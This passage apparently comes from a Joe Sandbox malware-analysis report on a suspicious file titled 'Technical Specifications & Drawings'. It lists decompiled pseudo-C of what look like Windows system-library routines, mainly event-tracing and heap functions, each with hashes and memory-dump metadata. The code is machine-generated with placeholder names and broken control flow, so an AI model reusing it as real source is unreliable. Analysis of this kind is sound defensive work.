                                                  				E0186AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                                  				if(E017C7D50() == 0) {
                                                  					_t16 = 0x7ffe0388;
                                                  				} else {
                                                  					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                  				}
                                                  				if( *_t16 != 0) {
                                                  					_t16 = E0185FE3F(_t22, _t35, _v8, _v12);
                                                  				}
                                                  				return _t16;
                                                  			}












                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1acec18707fd9f2032162878bc45f7486c95c60f6323f2aafef8902abb4afa2a
                                                  • Instruction ID: e340810281dc5ce83dc2fecb6a783aa218bcfc8f9bfb3be2c662224ffd04aa94
                                                  • Opcode Fuzzy Hash: 1acec18707fd9f2032162878bc45f7486c95c60f6323f2aafef8902abb4afa2a
                                                  • Instruction Fuzzy Hash: 76014C726047469FC711EF2CC808B1ABBD9BB84314F048529F986D3690DE30D644CB93
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 59%
                                                  			E0185FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                  				signed int _v12;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				short _v58;
                                                  				char _v64;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed char* _t18;
                                                  				intOrPtr _t24;
                                                  				intOrPtr _t30;
                                                  				intOrPtr _t31;
                                                  				signed int _t32;
                                                  
                                                  				_t29 = __edx;
                                                  				_t24 = __ebx;
                                                  				_v12 =  *0x189d360 ^ _t32;
                                                  				_t30 = __edx;
                                                  				_t31 = __ecx;
                                                  				E017EFA60( &_v64, 0, 0x30);
                                                  				_v24 = _a4;
                                                  				_v32 = _t31;
                                                  				_v28 = _t30;
                                                  				_v58 = 0x266;
                                                  				if(E017C7D50() == 0) {
                                                  					_t18 = 0x7ffe0388;
                                                  				} else {
                                                  					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                  				}
                                                  				_push( &_v64);
                                                  				_push(0x10);
                                                  				_push(0x20402);
                                                  				_push( *_t18 & 0x000000ff);
                                                  				return E017EB640(E017E9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                  			}

















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6b5361c9c995d663ed8e5e2adc7fe995cd3073f56c35e343116f406ab6b1a7ff
                                                  • Instruction ID: 8d71aaad8bfddd6af5762aee4801dd5c62d538f7924a7014f94da5a705a504ae
                                                  • Opcode Fuzzy Hash: 6b5361c9c995d663ed8e5e2adc7fe995cd3073f56c35e343116f406ab6b1a7ff
                                                  • Instruction Fuzzy Hash: CF018871A00209ABDB14DBA9D849FAEBBF8EF45700F404066FA01DB280D9709A41CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 59%
                                                  			E0185FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                  				signed int _v12;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				short _v58;
                                                  				char _v64;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed char* _t18;
                                                  				intOrPtr _t24;
                                                  				intOrPtr _t30;
                                                  				intOrPtr _t31;
                                                  				signed int _t32;
                                                  
                                                  				_t29 = __edx;
                                                  				_t24 = __ebx;
                                                  				_v12 =  *0x189d360 ^ _t32;
                                                  				_t30 = __edx;
                                                  				_t31 = __ecx;
                                                  				E017EFA60( &_v64, 0, 0x30);
                                                  				_v24 = _a4;
                                                  				_v32 = _t31;
                                                  				_v28 = _t30;
                                                  				_v58 = 0x267;
                                                  				if(E017C7D50() == 0) {
                                                  					_t18 = 0x7ffe0388;
                                                  				} else {
                                                  					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                  				}
                                                  				_push( &_v64);
                                                  				_push(0x10);
                                                  				_push(0x20402);
                                                  				_push( *_t18 & 0x000000ff);
                                                  				return E017EB640(E017E9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                  			}

















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b537f16d08796945b8de20af27b454103c06770ed70fbe2a5ba2be0aba02fb5b
                                                  • Instruction ID: 7e01c1808ca9e5c204e1d3e3fb46c9eaee0a87611fe8bd618a1383dd4dfb345a
                                                  • Opcode Fuzzy Hash: b537f16d08796945b8de20af27b454103c06770ed70fbe2a5ba2be0aba02fb5b
                                                  • Instruction Fuzzy Hash: 86018871A00209ABDB14DFA9D849FAEBBF8EF44704F004066F900DB281D9709A41CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 54%
                                                  			E01878A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                  				signed int _v12;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v36;
                                                  				intOrPtr _v40;
                                                  				short _v66;
                                                  				char _v72;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed char* _t18;
                                                  				signed int _t32;
                                                  
                                                  				_t29 = __edx;
                                                  				_v12 =  *0x189d360 ^ _t32;
                                                  				_t31 = _a8;
                                                  				_t30 = _a12;
                                                  				_v66 = 0x1c20;
                                                  				_v40 = __ecx;
                                                  				_v36 = __edx;
                                                  				_v32 = _a4;
                                                  				_v28 = _a8;
                                                  				_v24 = _a12;
                                                  				if(E017C7D50() == 0) {
                                                  					_t18 = 0x7ffe0386;
                                                  				} else {
                                                  					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                  				}
                                                  				_push( &_v72);
                                                  				_push(0x14);
                                                  				_push(0x20402);
                                                  				_push( *_t18 & 0x000000ff);
                                                  				return E017EB640(E017E9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                                  			}

















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12a2370d68ff22df6acb6a2c56fbda965ef4e700007e721bdb4fa812d4600aad
                                                  • Instruction ID: 467add101ce599c437ccb8c9e11c861875951d5e08a1df54adc677198947cf49
                                                  • Opcode Fuzzy Hash: 12a2370d68ff22df6acb6a2c56fbda965ef4e700007e721bdb4fa812d4600aad
                                                  • Instruction Fuzzy Hash: F50121B1A0021DAFCB04DFA9D9459AEFBF8FF59714F50405AF905E7341D634AA00CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 54%
                                                  			E01878ED6(intOrPtr __ecx, intOrPtr __edx) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v36;
                                                  				short _v62;
                                                  				char _v68;
                                                  				signed char* _t29;
                                                  				intOrPtr _t35;
                                                  				intOrPtr _t41;
                                                  				intOrPtr _t42;
                                                  				signed int _t43;
                                                  
                                                  				_t40 = __edx;
                                                  				_v8 =  *0x189d360 ^ _t43;
                                                  				_v28 = __ecx;
                                                  				_v62 = 0x1c2a;
                                                  				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                                  				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                                  				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                                  				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                                  				_v24 = __edx;
                                                  				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                                  				if(E017C7D50() == 0) {
                                                  					_t29 = 0x7ffe0386;
                                                  				} else {
                                                  					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                  				}
                                                  				_push( &_v68);
                                                  				_push(0x1c);
                                                  				_push(0x20402);
                                                  				_push( *_t29 & 0x000000ff);
                                                  				return E017EB640(E017E9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                                  			}



















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017ADB60(signed int __ecx) {
                                                  				intOrPtr* _t9;
                                                  				void* _t12;
                                                  				void* _t13;
                                                  				intOrPtr _t14;
                                                  
                                                  				_t9 = __ecx;
                                                  				_t14 = 0;
                                                  				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                                  					_t13 = 0xc000000d;
                                                  				} else {
                                                  					_t14 = E017ADB40();
                                                  					if(_t14 == 0) {
                                                  						_t13 = 0xc0000017;
                                                  					} else {
                                                  						_t13 = E017AE7B0(__ecx, _t12, _t14, 0xfff);
                                                  						if(_t13 < 0) {
                                                  							L017AE8B0(__ecx, _t14, 0xfff);
                                                  							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                                  							_t14 = 0;
                                                  						} else {
                                                  							_t13 = 0;
                                                  							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                                  						}
                                                  					}
                                                  				}
                                                  				 *_t9 = _t14;
                                                  				return _t13;
                                                  			}








                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017AB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                                  				signed char* _t13;
                                                  				intOrPtr _t22;
                                                  				char _t23;
                                                  
                                                  				_t23 = __edx;
                                                  				_t22 = __ecx;
                                                  				if(E017C7D50() != 0) {
                                                  					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                                  				} else {
                                                  					_t13 = 0x7ffe0384;
                                                  				}
                                                  				if( *_t13 != 0) {
                                                  					_t13 =  *[fs:0x30];
                                                  					if((_t13[0x240] & 0x00000004) == 0) {
                                                  						goto L3;
                                                  					}
                                                  					if(E017C7D50() == 0) {
                                                  						_t13 = 0x7ffe0385;
                                                  					} else {
                                                  						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                                  					}
                                                  					if(( *_t13 & 0x00000020) == 0) {
                                                  						goto L3;
                                                  					}
                                                  					return E01827016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                                  				} else {
                                                  					L3:
                                                  					return _t13;
                                                  				}
                                                  			}







                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 46%
                                                  			E0183FE87(intOrPtr __ecx) {
                                                  				signed int _v8;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				signed int _v24;
                                                  				intOrPtr _v28;
                                                  				short _v54;
                                                  				char _v60;
                                                  				signed char* _t21;
                                                  				intOrPtr _t27;
                                                  				intOrPtr _t32;
                                                  				intOrPtr _t33;
                                                  				intOrPtr _t34;
                                                  				signed int _t35;
                                                  
                                                  				_v8 =  *0x189d360 ^ _t35;
                                                  				_v16 = __ecx;
                                                  				_v54 = 0x1722;
                                                  				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                                  				_v28 =  *((intOrPtr*)(__ecx + 4));
                                                  				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                                  				if(E017C7D50() == 0) {
                                                  					_t21 = 0x7ffe0382;
                                                  				} else {
                                                  					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                                  				}
                                                  				_push( &_v60);
                                                  				_push(0x10);
                                                  				_push(0x20402);
                                                  				_push( *_t21 & 0x000000ff);
                                                  				return E017EB640(E017E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                  			}

















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 48%
                                                  			E0186131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				signed int _v8;
                                                  				intOrPtr _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				short _v50;
                                                  				char _v56;
                                                  				signed char* _t18;
                                                  				intOrPtr _t24;
                                                  				intOrPtr _t30;
                                                  				intOrPtr _t31;
                                                  				signed int _t32;
                                                  
                                                  				_t29 = __edx;
                                                  				_v8 =  *0x189d360 ^ _t32;
                                                  				_v20 = _a4;
                                                  				_v12 = _a8;
                                                  				_v24 = __ecx;
                                                  				_v16 = __edx;
                                                  				_v50 = 0x1021;
                                                  				if(E017C7D50() == 0) {
                                                  					_t18 = 0x7ffe0380;
                                                  				} else {
                                                  					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  				}
                                                  				_push( &_v56);
                                                  				_push(0x10);
                                                  				_push(0x20402);
                                                  				_push( *_t18 & 0x000000ff);
                                                  				return E017EB640(E017E9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                  			}
















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 48%
                                                  			E01878F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				signed int _v8;
                                                  				intOrPtr _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				short _v50;
                                                  				char _v56;
                                                  				signed char* _t18;
                                                  				intOrPtr _t24;
                                                  				intOrPtr _t30;
                                                  				intOrPtr _t31;
                                                  				signed int _t32;
                                                  
                                                  				_t29 = __edx;
                                                  				_v8 =  *0x189d360 ^ _t32;
                                                  				_v16 = __ecx;
                                                  				_v50 = 0x1c2c;
                                                  				_v24 = _a4;
                                                  				_v20 = _a8;
                                                  				_v12 = __edx;
                                                  				if(E017C7D50() == 0) {
                                                  					_t18 = 0x7ffe0386;
                                                  				} else {
                                                  					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                  				}
                                                  				_push( &_v56);
                                                  				_push(0x10);
                                                  				_push(0x402);
                                                  				_push( *_t18 & 0x000000ff);
                                                  				return E017EB640(E017E9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                  			}
















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 46%
                                                  			E01861608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                  				signed int _v8;
                                                  				intOrPtr _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				short _v46;
                                                  				char _v52;
                                                  				signed char* _t15;
                                                  				intOrPtr _t21;
                                                  				intOrPtr _t27;
                                                  				intOrPtr _t28;
                                                  				signed int _t29;
                                                  
                                                  				_t26 = __edx;
                                                  				_v8 =  *0x189d360 ^ _t29;
                                                  				_v12 = _a4;
                                                  				_v20 = __ecx;
                                                  				_v16 = __edx;
                                                  				_v46 = 0x1024;
                                                  				if(E017C7D50() == 0) {
                                                  					_t15 = 0x7ffe0380;
                                                  				} else {
                                                  					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  				}
                                                  				_push( &_v52);
                                                  				_push(0xc);
                                                  				_push(0x20402);
                                                  				_push( *_t15 & 0x000000ff);
                                                  				return E017EB640(E017E9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                                                  			}















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017CC577(void* __ecx, char _a4) {
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				void* _t17;
                                                  				void* _t19;
                                                  				void* _t20;
                                                  				void* _t21;
                                                  
                                                  				_t18 = __ecx;
                                                  				_t21 = __ecx;
                                                  				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E017CC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x17811cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                  					__eflags = _a4;
                                                  					if(__eflags != 0) {
                                                  						L10:
                                                  						E018788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                  						L9:
                                                  						return 0;
                                                  					}
                                                  					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                  					if(__eflags == 0) {
                                                  						goto L10;
                                                  					}
                                                  					goto L9;
                                                  				} else {
                                                  					return 1;
                                                  				}
                                                  			}










                                                  C-Code - Quality: 94%
                                                  			E01862073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                                  				void* __esi;
                                                  				signed char _t3;
                                                  				signed char _t7;
                                                  				void* _t19;
                                                  
                                                  				_t17 = __ecx;
                                                  				_t3 = E0185FD22(__ecx);
                                                  				_t19 =  *0x189849c - _t3; // 0x78df40c7
                                                  				if(_t19 == 0) {
                                                  					__eflags = _t17 -  *0x1898748; // 0x0
                                                  					if(__eflags <= 0) {
                                                  						E01861C06();
                                                  						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                                  						__eflags = _t3;
                                                  						if(_t3 != 0) {
                                                  							L5:
                                                  							__eflags =  *0x1898724 & 0x00000004;
                                                  							if(( *0x1898724 & 0x00000004) == 0) {
                                                  								asm("int3");
                                                  								return _t3;
                                                  							}
                                                  						} else {
                                                  							_t3 =  *0x7ffe02d4 & 0x00000003;
                                                  							__eflags = _t3 - 3;
                                                  							if(_t3 == 3) {
                                                  								goto L5;
                                                  							}
                                                  						}
                                                  					}
                                                  					return _t3;
                                                  				} else {
                                                  					_t7 =  *0x1898724; // 0x0
                                                  					return E01858DF1(__ebx, 0xc0000374, 0x1895890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                                  				}
                                                  			}








                                                  C-Code - Quality: 54%
                                                  			E017E927A(void* __ecx) {
                                                  				signed int _t11;
                                                  				void* _t14;
                                                  
                                                  				_t11 = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                                  				if(_t11 != 0) {
                                                  					E017EFA60(_t11, 0, 0x98);
                                                  					asm("movsd");
                                                  					asm("movsd");
                                                  					asm("movsd");
                                                  					asm("movsd");
                                                  					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                                  					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                                  					E017E92C6(_t11, _t14);
                                                  				}
                                                  				return _t11;
                                                  			}






                                                  C-Code - Quality: 43%
                                                  			E01878D34(intOrPtr __ecx, intOrPtr __edx) {
                                                  				signed int _v8;
                                                  				intOrPtr _v12;
                                                  				intOrPtr _v16;
                                                  				short _v42;
                                                  				char _v48;
                                                  				signed char* _t12;
                                                  				intOrPtr _t18;
                                                  				intOrPtr _t24;
                                                  				intOrPtr _t25;
                                                  				signed int _t26;
                                                  
                                                  				_t23 = __edx;
                                                  				_v8 =  *0x189d360 ^ _t26;
                                                  				_v16 = __ecx;
                                                  				_v42 = 0x1c2b;
                                                  				_v12 = __edx;
                                                  				if(E017C7D50() == 0) {
                                                  					_t12 = 0x7ffe0386;
                                                  				} else {
                                                  					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                  				}
                                                  				_push( &_v48);
                                                  				_push(8);
                                                  				_push(0x20402);
                                                  				_push( *_t12 & 0x000000ff);
                                                  				return E017EB640(E017E9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                                  			}














                                                  C-Code - Quality: 36%
                                                  			E01878B58(intOrPtr __ecx) {
                                                  				signed int _v8;
                                                  				intOrPtr _v20;
                                                  				short _v46;
                                                  				char _v52;
                                                  				signed char* _t11;
                                                  				intOrPtr _t17;
                                                  				intOrPtr _t22;
                                                  				intOrPtr _t23;
                                                  				intOrPtr _t24;
                                                  				signed int _t25;
                                                  
                                                  				_v8 =  *0x189d360 ^ _t25;
                                                  				_v20 = __ecx;
                                                  				_v46 = 0x1c26;
                                                  				if(E017C7D50() == 0) {
                                                  					_t11 = 0x7ffe0386;
                                                  				} else {
                                                  					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                  				}
                                                  				_push( &_v52);
                                                  				_push(4);
                                                  				_push(0x402);
                                                  				_push( *_t11 & 0x000000ff);
                                                  				return E017EB640(E017E9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                  			}














                                                  C-Code - Quality: 88%
                                                  			E017C746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                                  				signed int _t8;
                                                  				void* _t10;
                                                  				short* _t17;
                                                  				void* _t19;
                                                  				intOrPtr _t20;
                                                  				void* _t21;
                                                  
                                                  				_t20 = __esi;
                                                  				_t19 = __edi;
                                                  				_t17 = __ebx;
                                                  				if( *((char*)(_t21 - 0x25)) != 0) {
                                                  					if(__ecx == 0) {
                                                  						E017BEB70(__ecx, 0x18979a0);
                                                  					} else {
                                                  						asm("lock xadd [ecx], eax");
                                                  						if((_t8 | 0xffffffff) == 0) {
                                                  							_push( *((intOrPtr*)(__ecx + 4)));
                                                  							E017E95D0();
                                                  							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                                  							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                                  							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                                  						}
                                                  					}
                                                  					L10:
                                                  				}
                                                  				_t10 = _t19 + _t19;
                                                  				if(_t20 >= _t10) {
                                                  					if(_t19 != 0) {
                                                  						 *_t17 = 0;
                                                  						return 0;
                                                  					}
                                                  				}
                                                  				return _t10;
                                                  				goto L10;
                                                  			}










                                                  C-Code - Quality: 36%
                                                  			E01878CD6(intOrPtr __ecx) {
                                                  				signed int _v8;
                                                  				intOrPtr _v12;
                                                  				short _v38;
                                                  				char _v44;
                                                  				signed char* _t11;
                                                  				intOrPtr _t17;
                                                  				intOrPtr _t22;
                                                  				intOrPtr _t23;
                                                  				intOrPtr _t24;
                                                  				signed int _t25;
                                                  
                                                  				_v8 =  *0x189d360 ^ _t25;
                                                  				_v12 = __ecx;
                                                  				_v38 = 0x1c2d;
                                                  				if(E017C7D50() == 0) {
                                                  					_t11 = 0x7ffe0386;
                                                  				} else {
                                                  					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                  				}
                                                  				_push( &_v44);
                                                  				_push(0xffffffe4);
                                                  				_push(0x402);
                                                  				_push( *_t11 & 0x000000ff);
                                                  				return E017EB640(E017E9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                  			}














                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d4bdd9cee8956361473cbbb409bb002599672b200290db46b5b9eb221eece91e
                                                  • Instruction ID: e1c023c225d085a8c7b9485dbf936cddb1bedcb5e6a0df07761eb909ed26a051
                                                  • Opcode Fuzzy Hash: d4bdd9cee8956361473cbbb409bb002599672b200290db46b5b9eb221eece91e
                                                  • Instruction Fuzzy Hash: 12F08271A04609ABDB04DBA8D94EE6EBBF4EF19304F540199F916EB284EA34DA00CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017A4F2E(void* __ecx, char _a4) {
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				void* _t17;
                                                  				void* _t19;
                                                  				void* _t20;
                                                  				void* _t21;
                                                  
                                                  				_t18 = __ecx;
                                                  				_t21 = __ecx;
                                                  				if(__ecx == 0) {
                                                  					L6:
                                                  					__eflags = _a4;
                                                  					if(__eflags != 0) {
                                                  						L8:
                                                  						E018788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
